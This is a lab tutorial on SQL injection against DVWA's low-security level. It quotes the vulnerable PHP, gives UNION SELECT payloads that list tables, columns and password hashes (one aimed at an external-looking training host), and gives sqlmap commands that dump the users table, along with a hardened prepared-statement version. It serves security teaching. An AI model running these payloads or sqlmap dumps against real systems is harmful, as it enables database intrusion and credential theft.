
SQL injection vulnerability

1. SQL injection

1. SQL injection (low)

1) Understanding the vulnerable code

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            // $id is interpolated into the SQL string without any validation or escaping: this is the injection point
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Get values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }

            mysqli_close($GLOBALS["___mysqli_ston"]);
            break;
        case SQLITE:
            global $sqlite_db_connection;

            #$sqlite_db_connection = new SQLite3($_DVWA['SQLITE_DB']);
            #$sqlite_db_connection->enableExceptions(true);

            // Same unescaped interpolation of $id as in the MySQL branch
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }

            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
            } else {
                // Note: the original refers to $sqlite_db here, not the $sqlite_db_connection declared above
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    }
}

?>

The key line is:

SELECT first_name, last_name FROM users WHERE user_id = '$id';

This is the SQL statement that actually gets executed. Because the id we submit is pasted straight into it, we can change the statement by tampering with the input, for example:

SELECT first_name, last_name FROM users WHERE user_id = '-1' union select 1, 2 #';

That is, entering -1' union select 1, 2 # as the id turns the executed SQL into the statement above (in MySQL, # comments out the rest of the line, including the trailing quote).

The execution result is shown in a screenshot (not reproduced here).
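For contrast, here is the MySQL branch of the handler above rewritten the way it should be written. This is an added example, not DVWA's own code; it assumes the same connection handle ($GLOBALS["___mysqli_ston"]) and the same users table, and treats user_id as an integer column.

```php
<?php
// Added example (not DVWA's code): the low-level MySQL branch hardened with
// input validation, a prepared statement and output escaping.
// Assumes the same connection handle and users table as the original page.

if (isset($_REQUEST['Submit'])) {
    $id = $_REQUEST['id'];

    // user_id is assumed to be a numeric column: reject anything that is not
    // a positive integer before it gets anywhere near the database.
    if (filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]) === false) {
        http_response_code(400);
        exit('<pre>Invalid user ID</pre>');
    }
    $id = (int) $id;

    $db = $GLOBALS["___mysqli_ston"];

    // The query text is fixed at prepare time and the value is sent separately,
    // so input such as  -1' union select 1, 2 #  can only ever be a value
    // (and here it is already rejected by the integer check), never SQL.
    $stmt = mysqli_prepare($db, "SELECT first_name, last_name FROM users WHERE user_id = ?");
    if ($stmt === false) {
        http_response_code(500);
        // Do not echo mysqli_error() to the user: it leaks schema details.
        exit('<pre>Database error</pre>');
    }
    mysqli_stmt_bind_param($stmt, 'i', $id);
    mysqli_stmt_execute($stmt);
    mysqli_stmt_bind_result($stmt, $first, $last);

    while (mysqli_stmt_fetch($stmt)) {
        // Escape on output as well: stored names are untrusted data to the browser.
        echo "<pre>ID: " . htmlspecialchars((string) $id, ENT_QUOTES, 'UTF-8')
           . "<br />First name: " . htmlspecialchars((string) $first, ENT_QUOTES, 'UTF-8')
           . "<br />Surname: " . htmlspecialchars((string) $last, ENT_QUOTES, 'UTF-8')
           . "</pre>";
    }

    mysqli_stmt_close($stmt);
    mysqli_close($db);
}
?>
```

With this version the ORDER BY probing and UNION SELECT steps that follow produce a 400 response instead of altered queries, and sqlmap reports the parameter as not injectable.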

2) Steps for exploiting the SQL injection

① Use ORDER BY to determine the number of columns

SELECT first_name, last_name FROM users WHERE user_id = '1' order by 1 #';
SELECT first_name, last_name FROM users WHERE user_id = '1' order by 2 #';
SELECT first_name, last_name FROM users WHERE user_id = '1' order by 3 #';

The page returns an error once ORDER BY reaches 3, which indicates that the original query returns two columns.

② Use UNION SELECT to query other information

SELECT first_name, last_name FROM users WHERE user_id = '1' union select [sql1], [sql2], ... #';

Note that the number of columns in the UNION SELECT must be the same as the number of columns in the original query; otherwise the two result sets cannot be combined.

Query the names of the tables in the dvwa database:

SELECT first_name, last_name FROM users WHERE user_id = '1' union select table_name, table_schema from information_schema.tables where table_schema="dvwa" #';

The result is shown in a screenshot (not reproduced here).

There are two tables: guestbook and users.

Query which columns the users table has:

SELECT first_name, last_name FROM users WHERE user_id = '1' union select 1, column_name from information_schema.columns where table_schema="dvwa" and table_name ="users" #';

The result is shown in a screenshot (not reproduced here).

There are 8 columns in total; their names are listed in the screenshot.

Query the usernames and their corresponding passwords stored in the users table:

SELECT first_name, last_name FROM users WHERE user_id = '1' union select first_name, password from dvwa.users #';

The result is shown in a screenshot (not reproduced here).

We can see there are 5 users; the password values appear to be hashes.

For example, in the practical training project:

Query the column names of the t_admin table in the double_fish database:

http://www.wabjtam.ml:12380/News/newsView.php?newsId=-1 union select 1, 2, group_concat(column_name), 4, 5 from information_schema.columns where table_schema = "double_fish" and table_name="t_admin";

The group_concat() function is used to gather all the results into a single row.

The result is shown in a screenshot (not reproduced here).

3) Using sqlmap

① Test whether the parameter is injectable

python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="PHPSESSID=ilkvra6al6b12g57ab5cvn04qr; security=low"

-u: the URL containing the injection point

--cookie: DVWA requires a login, so we pass the session cookie along with the request

② List the database names

python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="PHPSESSID=ilkvra6al6b12g57ab5cvn04qr; security=low" --dbs

The result is shown in a screenshot (not reproduced here).

③ List the table names

python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="PHPSESSID=ilkvra6al6b12g57ab5cvn04qr; security=low" -D dvwa --tables

④ List the column names (the option is --columns, with two dashes)

python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="PHPSESSID=ilkvra6al6b12g57ab5cvn04qr; security=low" -D dvwa -T users --columns

⑤ Dump all data in the table (the option is --dump, with two dashes)

python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="PHPSESSID=ilkvra6al6b12g57ab5cvn04qr; security=low" -D dvwa -T users --dump